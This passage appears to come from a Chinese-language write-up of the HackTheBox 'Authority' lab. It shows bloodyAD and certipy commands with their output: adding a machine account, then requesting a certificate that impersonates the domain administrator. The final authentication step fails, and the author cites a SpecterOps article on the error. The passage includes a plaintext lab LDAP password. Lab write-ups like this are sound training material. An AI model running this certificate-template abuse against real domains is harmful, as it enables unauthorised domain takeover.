可以,使用 bloodyAD 创建一个计算机用户
┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# bloodyAD --host 10.10.11.222 -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -d authority.htb add computer c1trus A
dmin!
[+] c1trus$ created
2:为目标用户请求证书
┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# certipy req \
-u 'c1trus$' -p 'Admin!' \
-dc-ip '10.10.11.222' -target 'authority.authority.htb' \
-ca 'AUTHORITY-CA' -template 'CorpVPN' \
-upn 'administrator@authority.htb' -sid 'S-1-5-21-622327497-3269355298-2248959698-500'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 4
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate object SID is 'S-1-5-21-622327497-3269355298-2248959698-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
3: 使用pfx证书进行认证 获取目标用户的hash
┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.222'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@authority.htb'
[*] SAN URL SID: 'S-1-5-21-622327497-3269355298-2248959698-500'
[*] Security Extension SID: 'S-1-5-21-622327497-3269355298-2248959698-500'
[*] Using principal: 'administrator@authority.htb'
[*] Trying to get TGT...
[-] Got error while trying to request TGT:` Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)`
[-] Use -debug to print a stacktrace
[-] See the wiki for more information
Smart Card Logon 扩展密钥用法(EKU)。KDC_ERR_PADATA_TYPE_NOSUPP 错误。可以参考这篇文章的具体说明Certificates and Pwnage and Patches, Oh My! | by Will Schroeder | Posts By SpecterOps Team Members